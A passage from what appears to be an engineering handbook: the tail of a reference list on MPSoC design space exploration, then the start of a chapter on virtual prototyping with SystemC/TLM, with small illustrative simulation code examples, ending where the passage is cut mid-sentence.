Trace-based KPN composability analysis for mapping simultaneous applications to MPSoC
platforms. In: Proceedings of the conference on design, automation test in Europe (DATE),
pp 753–758
Castrillon J, Leupers R, Ascheid G (2013) MAPS: mapping concurrent dataflow applications to
heterogeneous MPSoCs. IEEE Trans Ind Inf 9(1):527–545
Ceng J, Sheng W, Castrillon J, Stulova A, Leupers R, Ascheid G, Meyr H (2009) A high-level
virtual platform for early MPSoC software development. In: Proceedings of the 7th IEEE/ACM
international conference on hardware/software codesign and system synthesis (CODES+ISSS)
Chen Z, Zhou Y, Huang Z (2019) Auto-creation of effective neural network architecture by
evolutionary algorithm and resnet for image classification. In: 2019 IEEE international
conference on systems, man and cybernetics (SMC). IEEE, pp 3895–3900
Deng J, Dong W, Socher R, Li LJ, Li K, Fei-Fei L (2009) Imagenet: a large-scale hierarchical
image database. In: 2009 IEEE conference on computer vision and pattern recognition. IEEE,
pp 248–255
Eeckhout L (2010) Computer architecture performance evaluation methods. Synthesis lectures on
computer architecture. Morgan & Claypool Publishers, San Rafael
Erbas C, Cerav-Erbas S, Pimentel AD (2006) Multiobjective optimization and evolutionary
algorithms for the application mapping problem in multiprocessor system-on-chip design. IEEE
Trans Evolut Comput 10(3):358–374
Erbas C, Pimentel AD, Thompson M, Polstra S (2007) A framework for system-level modeling
and simulation of embedded systems architectures. EURASIP J Embed Syst 2007:1–11
Ferrante A, Milosevic J, Janjšević M (2013) A security-enhanced design methodology for embed-
ded systems. In: Proceedings of the international conference on security and cryptography
(SECRYPT), pp 1–12
Gheorghita SV et al (2009) System-scenario-based design of dynamic embedded systems. ACM
Trans Des Autom Electronic Syst 14(1):1–45
Glaß M, Lukasiewycz M, Streichert T, Haubelt C, Teich J (2007) Reliability-aware system
synthesis. In: Proceedings of the conference on design, automation test in Europe, pp 1–6
Glaß M, Lukasiewycz M, Reimann F, Haubelt C, Teich J (2008) Symbolic reliability analysis and
optimization of ecu networks. In: Proceedings of the conference on design, automation and test
in Europe, pp 158–163
Singh AK, Shafique M, Kumar A, Henkel J (2013) Mapping on multi/many-core systems: survey
of current and emerging trends. In: Proceedings of the design automation conference (DAC),
pp 1–10
Stefanov T, Pimentel AD, Nikolov H (2017) Daedalus: system-level design methodology for
streaming multi-processor embedded systems-on-chip. In: Ha S, Teich J (eds) Handbook of
hardware/software codesign. Springer, Dordrecht
Stierand I, Malipatlolla S, Fröschle S, Stühring A, Henkler S (2014) Integrating the security aspect
into design space exploration of embedded systems. In: Proceedings of the IEEE international
symposium on software reliability engineering workshops, pp 371–376
Tan B, Biglari-Abhari M, Salcic Z (2017) An automated security-aware approach for design of
embedded systems on MPSoC. ACM Trans Embed Comput Syst 16(5s):1–20
Thompson M (2012) Tools and techniques for efficient system-level design space exploration.
Ph.D. thesis, Universiteit van Amsterdam
Thompson M, Pimentel AD (2007) Towards multi-application workload modeling in sesame
for system-level design space exploration. In: Vassiliadis S, Bereković M, Hämäläinen
TD (eds) Embedded computer systems: architectures, modeling, and simulation. Springer,
Berlin/Heidelberg, pp 222–232
Thompson M, Pimentel AD (2013) Exploiting domain knowledge in system-level MPSoC design
space exploration. J Syst Archit 59(7):351–360
Thompson M, Pimentel AD, Polstra S, Erbas C (2006) A mixed-level co-simulation method
for system-level design space exploration. In: Proceedings of the IEEE/ACM workshop on
embedded systems for real-time multimedia (ESTIMedia’06), pp 27–32
Thompson M, Nikolov H, Stefanov T, Pimentel AD, Erbas C, Polstra S, Deprettere E (2007) A
framework for rapid system-level exploration, synthesis and programming of multimedia MP-
SoCs. In: CODES+ISSS’07: proceedings of the 5th IEEE/ACM international conference on
hardware/software codesign and system synthesis, pp 9–14
Thoziyoor S, Ahn JH, Monchiero M, Brockman JB, Jouppi NP (2008) A comprehensive memory
modeling tool and its application to the design and analysis of future memory hierarchies. In:
Proceedings of the international symposium on computer architecture (ISCA), pp 51–62
Uhlig RA, Mudge TN (1997) Trace-driven memory simulation: a survey. ACM Comput Surv
29(2):128–170
van Stralen P, Pimentel AD (2010a) Scenario-based design space exploration of MPSoCs. In:
Proceedings of IEEE international conference on computer design (ICCD), pp 305–312
van Stralen P, Pimentel AD (2010b) A trace-based scenario database for high-level simulation of
multimedia MP-SoCs. In: Proceedings of the international conference on embedded computer
systems: architectures, modeling and simulation (SAMOS), pp 11–19
van Stralen P, Pimentel AD (2012) A SAFE approach towards early design space exploration of
fault-tolerant multimedia MPSoCs. In: Proceedings of international conference on hardware/
software codesign and system synthesis (CODES+ISSS), pp 393–402
van Stralen P, Pimentel AD (2013) Fitness prediction techniques for scenario-based design space
exploration. IEEE Trans Comput-Aided Des Integr Circuits Syst 32(8):1240–1253
Weichslgartner A, Wildermann S, Götzfried J, Freiling F, Glaß M, Teich J (2016)
Design-time/run-time mapping of security-critical applications in heterogeneous MPSoCs. In:
Proceedings of the 19th international workshop on software and compilers for embedded
systems (SCOPES), pp 153–162
Wolf W, Jerraya AA, Martin G (2008) Multiprocessor system-on-chip (MPSoC) technology. IEEE
Trans Comput-Aided Des Integr Circuits Syst 27(10):1701–1713
Xie L, Yuille A (2017) Genetic CNN. In: Proceedings of the IEEE international conference on
computer vision, pp 1379–1388
Virtual Prototyping of Processor-Based
Platforms 27
Tim Kogel
Contents
Introduction to Virtual Prototypes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 949
SoC Design and Verification Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 949
Historic Background of Virtual Prototyping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 951
Virtual Prototyping in the Verification Continuum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 952
Use-Cases for Virtual Prototypes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 954
Architecture Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 956
Software Use-Cases . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 960
Hybrid Use-Cases for Software-Driven Functional Verification . . . . . . . . . . . . . . . . . . . . . 963
System-Level Power Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 965
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 966
Building Transaction Level Virtual Prototypes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 967
The SystemC Transaction Level Modeling Standard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 967
Building TLM Components for Virtual Prototypes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 973
SSD Controller SoC Case Study . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 977
SSD Controller SoC Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 978
Loosely Timed Virtual Prototype of the SSD SoC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 979
Accurate Virtual Prototype of SSD SoC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 980
SSD Case Study Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 982
Conclusion and Outlook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 982
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 984
T. Kogel ()
Synopsys, Inc., Aachen, Germany
e-mail: [email protected]

Abstract
Virtual Prototypes help to reduce risk, shorten time to market, increase design productivity,
and improve the quality of results. This chapter motivates the usage of Virtual
Prototypes and gives an extensive overview of the use-cases in the area of archi-
tecture analysis, software development, and functional verification of processor-
based platforms. This chapter also covers the modeling of Virtual Prototypes,
including an introduction of the SystemC Transaction Level Modeling (TLM)
standard and the modeling of processors and peripheral components. In the last
section, the described concepts of Virtual Prototyping are illustrated by an SSD
Controller example.
Introduction to Virtual Prototypes

This section first gives a brief overview of the design and verification of processor-
based SoCs. Based on this overview, the need for Virtual Prototyping to cope
with the growing complexity of architecture specification as well as software
development and testing is discussed.
SoC Design and Verification Overview

Today, most chip designs are in fact System-on-Chips (SoC), integrating a mix
of components such as several programmable cores (CPU, GPU, DSP, etc.),
accelerators, different types of memories, a complex interconnect, and potentially
other components (Greaves 2021). According to Handel Jones from IBS, “IC design
costs have jumped from $51.3 million for a 28 nm planar device to $297.8 million
for a 7 nm chip and $542.2 million for 5 nm” (Lapedus 2018). Curiously, the
implementation of new hardware blocks is not a significant cost factor, mostly
because the majority of components are re-usable IP blocks. Instead, much of the
cost is attributed to software development and verification, but also architecture
specification, IP qualification, and SoC-level hardware/software validation.
Figure 1 outlines the state-of-the-art SoC development flow. The classic hardware
design entry is a Register Transfer Level (RTL) implementation based on a Hardware Description Language (HDL) like Verilog or VHDL. This RTL description can be automatically taken to silicon using standard EDA tools for logic synthesis, place-and-route, etc. RTL is still a very detailed design entry, so it takes high effort to implement and especially to verify a hardware component at this level. The development of SoCs with billions of transistors is only feasible because the design entry has moved to higher levels of abstraction. The most productive approach is to
re-use available Intellectual Property (IP) blocks, which are developed internally or
licensed from 3rd party IP providers.
However, custom design is still required for differentiated components, e.g., to accelerate a specific algorithm in order to achieve the necessary computational performance.

Historic Background of Virtual Prototyping

SystemC emerged in the late 1990s as a C++ class library that supported the modeling of parallel HW modules and time, but in the initial version the communication was still limited to HW signals.
The next major release, SystemC 2.0, generalized the modeling of interfaces
between modules, and this way enabled Transaction Level Modeling (TLM)
(Groetker et al. 2002). Still, this did not ensure the level of interoperability required
for the seamless exchange of models. Hence, the next major milestone was the
standardization of a set of well-defined TLM interfaces in 2008. The SystemC
library and TLM APIs were standardized by IEEE in 2005 and 2011, respectively
(IEEE Standard for Standard SystemC Language Reference Manual 2012). As
further explained in section “The SystemC Transaction Level Modeling Standard”,
the Loosely Timed and Approximately Timed APIs defined by the TLM standard
are today the established interoperability standard for Virtual Prototypes.
Virtual Prototyping in the Verification Continuum

A multitude of tools and methods is required to cover the different aspects of SoC verification. Figure 2 qualitatively characterizes prominent verification methods with respect to their suitability for architecture analysis and software development. The analysis is based on the following criteria:
• Speed refers to the time it takes to execute a hardware and/or software test.
• Turn-around time refers to the time to modify and rebuild the hardware and/or
software implementation and/or test.
• Early availability describes at what time in the development process the respec-
tive method is available.
• Timing Accuracy denotes the level of timing detail and hence the suitability for
performance analysis.
• Debug and analysis capabilities characterize the observability and controllability of the hardware and/or software under test.
Fig. 2 Comparison of verification methods for architecture design and embedded software
development. Rating: (+)+ → (very) high, 0 → intermediate, (−)− → (very) low
• Virtual Prototypes for architecture analysis are relatively slow, typically in the range of 10–100 kcycles/s, but provide the required level of timing detail for performance analysis. They are available early, ahead of RTL, and provide extensive analysis visibility to support the SoC specification with quantitative data. The fast turn-around time of abstract configurable models enables large-scale design-space exploration.
• Virtual Prototypes for software development trade timing accuracy for much higher simulation speed, in the order of 10–100 MIPS. The model-based approach enables software developers to shift left HW/SW integration, debug, and testing, but also to scale up to many users and software regression testing.
In both cases, Virtual Prototypes enable the collaboration across teams and com-
panies, e.g., system and semiconductor companies can jointly define the SoC
architecture based on an executable specification, or semiconductor companies can
enable their customers with a virtual HW/SW integration environment 6–12 months
before silicon availability.
The total cost of deployment is of course another important criterion in addition
to the technical aspects discussed above. Virtual Prototypes come with a price tag
for tool and IP model licenses (or in-house development effort based on open-
source software) as well as for the development of custom models and SoC model
integration. The initial modeling effort for the first Virtual Prototyping project might
be high, but typically many of the IP choices remain constant from one project to
the next. Hence, the ROI greatly increases once a baseline library of models has
been developed, and Virtual Prototyping is deployed as plan of record over multiple
projects.
The remainder of this chapter is organized as follows: section “Use-Cases
for Virtual Prototypes” introduces use-cases of Virtual Prototypes in more detail,
including architecture specification and validation, early software development,
software testing, software-driven functional verification, and early power analysis.
After that, section “Building Transaction Level Virtual Prototypes” covers the
modeling aspects, introducing the TLM 2.0 standard, the levels of abstraction to
address the simulation speed and accuracy requirements of different use-cases, and
in particular the modeling of processors and peripheral components. Finally, we
illustrate the creation and usage of Virtual Prototypes based on a case-study from
the SSD controller domain in section “SSD Controller SoC Case Study”.
Use-Cases for Virtual Prototypes

The goal of this section is to describe different ways in which Virtual Prototypes
are deployed and what kind of development problems they address. One important
consideration is the specific requirements of the respective use-cases on the Virtual
Prototypes in terms of simulation speed, functional and timing accuracy, visibility,
flexibility, etc. These requirements drive the discussion of abstraction levels in the
next section.
Figure 3 gives an overview of the major use-cases for Virtual Prototyping
along the SoC product life-cycle and as they relate to semiconductor and system
companies.
In the semiconductor development process, the implementation specification
of a new SoC is an important milestone, which determines the major Key Per-
formance Indicators (KPI) like performance, power, and cost. As described in
section “Macro-architecture Specification” Virtual Prototypes for architecture anal-
ysis and exploration help to arrive at an optimal specification, such that the final
SoC meets the KPIs for the target workloads.
Often the semiconductor vendor can only guess what the application workloads will look like, since this knowledge resides at the system companies building the actual end product around the chip. Here, Virtual Prototypes for architecture analysis can serve as an executable specification for the collaboration between both parties.
Fig. 3 Virtual Prototyping use-cases for early architecture analysis (left, dark orange) and
software development (right, light orange) along the product life-cycle
Architecture Analysis
Macro-architecture Specification
In this context, the macro-architecture refers to the configuration of an SoC sub-
system, an SoC, or a multi-SoC design, i.e., the number and type of components
and how they are configured and connected. In contrast, the micro-architecture is
concerned with the implementation details of a single component, e.g., the processor
pipeline or the structure of a Multiply-Accumulate (MAC) array inside a Deep
Learning Accelerator (DLA). The specification of the macro-architecture has major
impact on the non-functional properties of the final product in terms of performance,
power, and cost.
Traditionally, the architecture specification and exploration is done with spreadsheet analysis, using static formulas to calculate the KPIs.
Fig. 4 Main architecture use-cases, left showing early architecture exploration and optimization
with workload models, right showing performance validation with software
In general, the classic Y-chart approach (Kienhuis et al. 1997) is well suited
to address these requirements. As illustrated on the left side of Fig. 4, the idea
is to replace the missing software with a non-functional task graph, which does
not model any behavior, but expresses the available thread-level parallelism and
dependencies of the actual application as well as the processing and communication
requirements. This task-based application workload model can be mapped to
Virtual Processing Units (VPU), which model the execution resources, e.g., a
CPU, GPU, DSP, or HW accelerator (Kempf et al. 2005; Kogel 2006). The VPU
translates the communication requirements from the task graph into transactions,
so the interconnect and memory resources can be represented as timing accurate
TLM models. The timing is modeled by combining stochastic characterization
of individual tasks and the simulation of dynamic effects like task scheduling,
interconnect arbitration, and memory latencies.
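As a minimal illustration (and explicitly not the API of any particular tool), the following sketch shows a hypothetical VPU in plain SystemC: it consumes the characterized processing time of each task mapped onto it and emits the task's communication requirement towards the interconnect model. All names, timings, and the FIFO stand-in for the interconnect are invented assumptions.

#include <systemc>
#include <iostream>
#include <vector>
using namespace sc_core;

// Hypothetical task descriptor: one node of the workload task graph, carrying
// only processing and communication requirements, no functional behavior.
struct Task {
  const char* name;
  sc_time     compute;    // characterized processing time on this resource
  unsigned    bytes_out;  // communication requirement towards the next task
};

// Minimal Virtual Processing Unit: executes whatever tasks are mapped onto it.
SC_MODULE(VPU) {
  std::vector<Task> mapped_tasks;   // flexible task-to-resource allocation
  sc_fifo_out<unsigned> bus;        // stand-in for the generated TLM traffic
  SC_CTOR(VPU) { SC_THREAD(run); }
  void run() {
    for (const Task& t : mapped_tasks) {
      wait(t.compute);              // consume the annotated processing time
      bus.write(t.bytes_out);       // hand the transfer to the interconnect model
      std::cout << sc_time_stamp() << ": " << t.name << " done" << std::endl;
    }
  }
};

int sc_main(int, char**) {
  VPU vpu("cpu0");
  vpu.mapped_tasks = { {"decode", sc_time(50, SC_US), 4096},
                       {"filter", sc_time(120, SC_US), 8192} };
  sc_fifo<unsigned> interconnect(8);  // placeholder channel
  vpu.bus(interconnect);
  sc_start(1, SC_MS);
  return 0;
}

Remapping the same task list to a different VPU instance, or changing the characterized times, is all it takes to explore an alternative application mapping.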
This type of workload-based Virtual Prototype meets the requirements for macro-
architecture specification. It is purely based on TLM models and hence does not
depend on any software or hardware implementation. With the right modeling
libraries, the Virtual Prototype is sufficiently easy to create, accurate, and fast.
The flexible allocation of tasks to resources enables fast exploration of application
mapping options. For commercial production projects, this modeling approach
should be combined with the corresponding tooling and model library to achieve
the necessary productivity for the creation, simulation, and analysis during the short
architecture specification phase (Kogel 2017).
Under the umbrella of macro-architecture specification, a workload-based Virtual Prototype can be used for a number of specific tasks.
Software Use-Cases
This section describes the usage of Virtual Prototypes for software-related use-
cases like Operating System (OS) bring-up, driver debug, regression testing, etc.
The common foundation is a transaction-level simulation model of the SoC capable
of executing the unmodified software stack as it would also run on the real silicon.
The emphasis is less on non-functional aspects like performance and power, and more on highest simulation speed and sufficient functional completeness to cater to the requirements of software developers.
A typical flow for the creation and usage of Virtual Prototypes for software
development (SW-VP) is shown in Fig. 5. A SW-VP contains all the components
that are visible to the programmers’ view of the SoC, i.e., Instruction Set Simulators
(ISSes) of the programmable cores, relevant peripherals like interrupt controller,
timers, UART, memory, flash, etc. Depending on the needs of the SW stack that
is executed on top of the SW-VP, further sub-systems like the power management
controller, GPU, external IO, and hardware accelerators also need to be represented.
The required transaction level models are either provided by the IP suppliers
(Arm Fast Models; Synopsys DesignWare TLM library; Tensilica Customizable
Processors; Intel Integrated Simulation Infrastructure with Modeling; CEVA), or
need to be created by the SW-VP developer.
Independent of the specific use-case, SW-VPs provide several common benefits.
Virtual Hardware in the Loop (HiL) is one important use-case in the automotive
domain for the integration of Virtual Prototypes with 3rd party simulators (Feldner
et al. 2019). As an example, a real-time engine controller application can be
executed on the SW-VP of an Electronic Control Unit (ECU) (Reyes 2013). The
external ECU interfaces are connected to a plant model of the engine, which can
often be reused from a model-based design flow of the control algorithm, e.g.,
in Matlab/Simulink (Simulink). In this context, the Functional Mock-up Interface
(FMI) (Functional Mock-up Interface) as defined by the Modelica Association (The
Modelica Association) is an important interoperability standard for the integration
of plant models into heterogeneous simulation environments.
The following sections describe the use-cases enabled by VPs for SW in more
detail.
As illustrated in Fig. 6, the software stack can be brought up incrementally on a Virtual Prototype that grows with the needs of the software:
• The OS bring-up requires only a rudimentary VP, containing the CPU, Interrupt
Controller, Timer, and a UART.
• Further sub-systems need to be added to the VP in order to enable the develop-
ment of the respective driver code, e.g., for PCIe, Ethernet, USB, etc.
• Developing and testing the secure boot code requires corresponding models of
hardware security modules in the VP.
• Bring-up of Middleware layers, like graphics, audio, video, and AI, again
requires the models of the corresponding sub-systems around the GPU, audio
DSP, video/image processor, and AI accelerator.
Fig. 6 Shift left concept, (top) traditional sequential bring-up process based on available hard-
ware, (bottom) incremental parallel process supported by Virtual Prototypes
Regression testing is typically a batch process, automated by a continuous integration server like Jenkins (Jenkins Automation Server for Continuous Integration/Continuous Delivery). SW-VPs are well suited as an execution target for such a state-of-the-art DevOps flow for embedded SW, as they are more scalable, observable, manipulable, and deterministic than real HW (Bhote et al. 2019; Accelerate Devops 2019).
The typical regression flow is depicted in Fig. 7. The embedded software code
is maintained in a revision control system for productive distributed development
and version management. The same applies to the unit and integration tests as well as the Virtual Prototype, all of which evolve over the product life cycle. Any
modification triggers the continuous integration pipeline, including the build of
the embedded SW and the SW-VP, and then the tests are executed in parallel on
a compute farm. The scripting capabilities of the SW-VP allow the consolidation
of the test results, comprising pass/fail and coverage reports as well as profiling of
metrics such as SW execution times and memory footprint.
As indicated on the right side of Fig. 3, the usage of SW-VPs for regression
testing extends into the post-silicon phase, well beyond the usage for early bring-up.
Even when evaluation boards become available, the SW-VP is a more productive
vehicle for regression testing, as they provide the scalability and availability to
serve large and distributed SW development teams. The deterministic execution
improves the robustness of the test flow, avoiding the unproductive hunt for false-
negative test results due to non-deterministic hardware effects. Especially safety
critical applications can benefit from the automated fault injection features of SW-
VPs; see Oetjens et al. (2014) and Section 4.4 on Virtual Prototyping use-cases for
embedded software testing in DeSchutter (2014).
Fig. 7 Building a continuous integration pipeline for embedded software testing with Virtual Prototypes

Hybrid Use-Cases for Software-Driven Functional Verification

So far, we have considered “pure virtual” use-cases, where the Virtual Prototype is constructed entirely from TLM models. There are many good reasons for “hybrid” use-cases, where the SoC is split into a virtual TLM-based part and an RTL-based part. The typical setup is that the CPU sub-system executing the main SW stack is running on the virtual side, and varying portions of the remaining SoC are at the Register Transfer Level (RTL). This enables software-driven functional verification, checking the correctness of the RTL in the context of the real SW stack.

As shown in Fig. 8, these hybrid use-cases are categorized, depending on the execution environment of the RTL portion, into RTL co-simulation, hybrid emulation, and hybrid FPGA prototyping.

Fig. 8 Variations of Hybrid Prototyping use-cases: (left) RTL co-simulation, (middle) hybrid emulation, (right) hybrid FPGA prototyping
RTL Co-simulation
The primary use-case for RTL simulation is block-level functional verification,
typically following the SystemVerilog based Universal Verification Methodology
(UVM) (IEEE Standard for Universal Verification Methodology Language Refer-
ence Manual 2020). UVM advocates self-checking testbenches with constrained
random stimuli generation for high coverage. To ensure that the Device Under Test
(DUT) also operates as expected in the real-world context, directed SW-driven tests
verify the RTL using actual SW drivers. Running the CPU executing the SW stack
in the RTL would result in very slow simulation speed and a long time to reach the
actual start of the test after the OS is booted up. This simulation can be accelerated
by running the SW on a virtual model of the CPU sub-system, especially when the
TLM and RTL portions are simulated asynchronously (Mäenpää 2020).
Hybrid Emulation
Hardware Emulation can simulate a full SoC at RTL in the range of 5–10 MIPS,
enabling the execution of real SW. However, the emulation of the CPU sub-system
consumes large amounts of emulator resources, and booting an OS at typical
emulation speed of 1–10 MIPS still takes in the order of hours. Again, replacing the
CPU sub-system with a virtual model running at 100 MIPS saves emulator resources
and accelerates the execution by 1–2 orders of magnitude, reducing the OS boot time
to just minutes. With this cost and performance advantage, Hybrid Emulation has
become the standard approach for SoC-level hardware/software verification.
In many cases, hybrid emulation is the entry point for using virtual methods.
Commercial hybrid emulation solutions are available from all major EDA vendors,
and the required virtual models of the CPU sub-system are provided by the IP
vendor (Arm Fast Models; DesignWare ARC nSIM). Compared to a full Virtual
Prototype, the creation of TLM models of custom components is not required.
System-Level Power Analysis

The focus of the previous sections is on using Virtual Prototypes for architecture
analysis and for SW development. This section shows how to enable early power
analysis as an overlay to the Virtual Prototyping use-cases discussed so far.
The annotation of power information is achieved by means of System Level
Power (SLP) models, i.e., power models of IP components specifically for appli-
cation in system level design use-cases. The format of system level IP power
models is defined by the IEEE 1801-2015 standard (IEEE Standard for Design and
Verification of Low-Power Integrated Circuits 2015). Originally, the IEEE 1801
Universal Power Format (UPF) was defined to capture power intent for hardware
implementation and verification. UPF is a TCL (Tool Command Language) based format and defines the power supply and low power details
as an overlay to the actual HDL implementation (Flynn et al. 2007). The System
Level Power features of the 1801-2015 UPF 3.0 release extend the UPF TCL syntax
to model power consumption as an overlay.
Figure 9 shows an example of a Virtual Prototype with a UPF 3.0 system level
power overlay model. The power state machine defines the power consumption of each component, depending on its current operating state.

Fig. 9 Virtual Prototype with UPF 3.0 System Level Power Monitor

The characterization determines how the power expressions calculate the power consumption based on power estimates or measurements:
• An early power characterization can be defined using high level estimates, e.g.,
based on the extrapolation of power measurements from previous projects.
• Once RTL and technology libraries are available, RTL or gate-level power
estimation tools can be used to generate look-up tables, which determine power
consumption based on design parameter configuration and operating mode.
• Post-silicon power measurements can still be valuable to characterize the power
consumption of a re-usable IP block for usage in subsequent projects.
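The essence of such a characterization can be shown in a small sketch. A production flow would express this as an IEEE 1801 UPF 3.0 overlay; the plain C++ below, with invented state names and power values, merely shows how a look-up table and state residency combine into energy and average power.

#include <cstdio>
#include <map>
#include <string>

// Hypothetical characterization table: average power per operating state,
// e.g., extrapolated from a previous project or from RTL power estimation.
struct PowerModel {
  std::map<std::string, double> state_power_mw = {
    {"OFF", 0.0}, {"IDLE", 1.5}, {"ACTIVE", 42.0}
  };
  double energy_uj = 0.0;

  // Called whenever the component spends dt_us microseconds in `state`.
  void account(const std::string& state, double dt_us) {
    energy_uj += state_power_mw.at(state) * dt_us / 1000.0;  // mW*us = nJ -> /1000 = uJ
  }
};

int main() {
  PowerModel pm;
  pm.account("ACTIVE", 200.0);  // 200 us active ...
  pm.account("IDLE", 800.0);    // ... followed by 800 us idle
  double total_ms = 1.0;        // 1000 us of simulated time
  std::printf("energy: %.2f uJ, average power: %.2f mW\n",
              pm.energy_uj, pm.energy_uj / total_ms);  // uJ per ms = mW
  return 0;
}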
Despite the high level of abstraction, it turns out that Virtual Prototypes with system level power analysis models provide power estimates in the order of 85–90% accuracy, which is good enough to steer architecture design decisions and to guide SW development in the right direction (Schürmans et al. 2013).
Summary
This section gave an overview of the many use-cases for Virtual Prototypes,
covering early architecture analysis, early software development, regression testing,
and RTL verification based on hybrid prototypes. The benefits in reducing risk,
accelerating schedules, and increasing productivity of HW and SW design are
driving an increasing deployment of Virtual Prototypes in many application domains
(Arm Fixed Virtual Platforms):
• Early on, mobile application processors and modems were the driver for Virtual
Prototypes to cope with the short design cycles (Aldis 2006).
• The complexity and accelerated innovation in automotive software and electro-
nics is driving increased usage of VPs, especially to improve functional safety
with virtual testing (Feldner et al. 2019).
• Many state-of-the-art SoC design projects in highly competitive application
domains like Artificial Intelligence, SSD storage (Kang et al. 2019), SmartNIC,
IoT, etc. deploy VPs for architecture design and pre-RTL SW development.
Building Transaction Level Virtual Prototypes

A typical flow for the creation of Virtual Prototypes from Transaction Level Models
is shown in Fig. 5. As discussed in previous sections, the suitable level of abstraction
differs greatly depending on the target use-case of the VP. VPs for architecture
analysis require timing accuracy, but can tolerate lower simulation speed, whereas
VPs for SW development require highest possible simulation speed, but only
minimal timing for the functional execution of the embedded SW. This section
first defines more precisely the levels of abstraction for building Virtual Prototypes,
starting with the modeling styles as defined by the SystemC TLM standard. After
that the creation of TLM models for the different components in processor-based
SoCs is presented.
The SystemC Transaction Level Modeling Standard

The IEEE 1666 standard for SystemC and Transaction Level Modeling (TLM)
defines the widely accepted modeling language for the creation of Virtual Proto-
types (IEEE Standard for Standard SystemC Language Reference Manual 2012).
SystemC is a C++ library providing a set of classes to model system components and
their communication interfaces, including a co-operative multitasking environment
to model concurrent activity in a system.
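A minimal sketch of these concepts is shown below: two concurrent modules, scheduled co-operatively by the SystemC kernel, communicate through a standard channel while simulated time advances. All names and timings are made up for the example.

#include <systemc>
#include <iostream>
using namespace sc_core;

SC_MODULE(Producer) {
  sc_fifo_out<int> out;
  SC_CTOR(Producer) { SC_THREAD(run); }   // a co-operatively scheduled process
  void run() {
    for (int i = 0; i < 4; ++i) {
      wait(10, SC_NS);                    // model some processing time
      out.write(i);                       // blocking write into the channel
    }
  }
};

SC_MODULE(Consumer) {
  sc_fifo_in<int> in;
  SC_CTOR(Consumer) { SC_THREAD(run); }
  void run() {
    while (true) {
      int v = in.read();                  // blocks until data is available
      std::cout << sc_time_stamp() << ": received " << v << std::endl;
    }
  }
};

int sc_main(int, char**) {
  Producer p("producer");
  Consumer c("consumer");
  sc_fifo<int> channel(2);                // bounded communication channel
  p.out(channel);
  c.in(channel);
  sc_start(1, SC_US);                     // run the simulation kernel
  return 0;
}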
On top of SystemC, the TLM library supports the abstract modeling of com-
munication interfaces between SoC components. Since 2008, the TLM-2.0 standard has provided a well-defined set of APIs and payload constructs to create interoperable
TLM models for memory-map-based on-chip communication protocols. On the
other hand, the TLM-2.0 standard is not really suitable for modeling serial interfaces
for the integration of multiple SoCs. This is considered a missing capability,
especially for constructing Virtual Prototypes of bigger systems with multiple SoCs,
like an automotive Electronic Control Unit (ECU) (Feldner et al. 2019).
At the synthesizable Register Transfer Level (RTL), a typical on-chip commu-
nication protocol like AMBA (AMBA AXI and ACE Protocol Specification 2013)
is based on hundreds of individual signals for all attributes of a transaction, like
address, data, control, and synchronization. The key idea of TLM is to model
communication as a set of function calls and a payload data structure representing the
full semantics of the communication interface. This greatly reduces the number of
synchronization points between communicating component models, which accord-
ingly improves the overall speed of the event-driven SystemC simulation kernel.
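The following minimal sketch shows this key idea: an entire memory transaction becomes a single b_transport function call carrying a generic payload object, rather than many cycles of signal activity. The 1 KiB memory and the 20 ns latency are arbitrary assumptions for the example.

#include <systemc>
#include <tlm>
#include <tlm_utils/simple_initiator_socket.h>
#include <tlm_utils/simple_target_socket.h>
#include <cstring>
using namespace sc_core;

// A trivial 1 KiB memory exposing a blocking TLM-2.0 target socket.
SC_MODULE(Memory) {
  tlm_utils::simple_target_socket<Memory> socket;
  unsigned char mem[1024];
  SC_CTOR(Memory) : socket("socket") {
    socket.register_b_transport(this, &Memory::b_transport);
  }
  void b_transport(tlm::tlm_generic_payload& trans, sc_time& delay) {
    unsigned char* ptr = mem + trans.get_address();
    if (trans.is_write()) std::memcpy(ptr, trans.get_data_ptr(), trans.get_data_length());
    else                  std::memcpy(trans.get_data_ptr(), ptr, trans.get_data_length());
    delay += sc_time(20, SC_NS);             // annotated access latency
    trans.set_response_status(tlm::TLM_OK_RESPONSE);
  }
};

// The initiator issues one write: address, data, and control travel together
// in the payload, with a single synchronization point instead of hundreds.
SC_MODULE(Initiator) {
  tlm_utils::simple_initiator_socket<Initiator> socket;
  SC_CTOR(Initiator) : socket("socket") { SC_THREAD(run); }
  void run() {
    tlm::tlm_generic_payload trans;
    unsigned int data = 0xDEADBEEF;
    sc_time delay = SC_ZERO_TIME;
    trans.set_command(tlm::TLM_WRITE_COMMAND);
    trans.set_address(0x40);
    trans.set_data_ptr(reinterpret_cast<unsigned char*>(&data));
    trans.set_data_length(4);
    socket->b_transport(trans, delay);       // the whole transfer in one call
    wait(delay);                             // consume the annotated latency
  }
};

int sc_main(int, char**) {
  Initiator i("initiator");
  Memory m("memory");
  i.socket.bind(m.socket);
  sc_start();
  return 0;
}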
To cover the modeling requirements of different VP use-cases, the IEEE Std
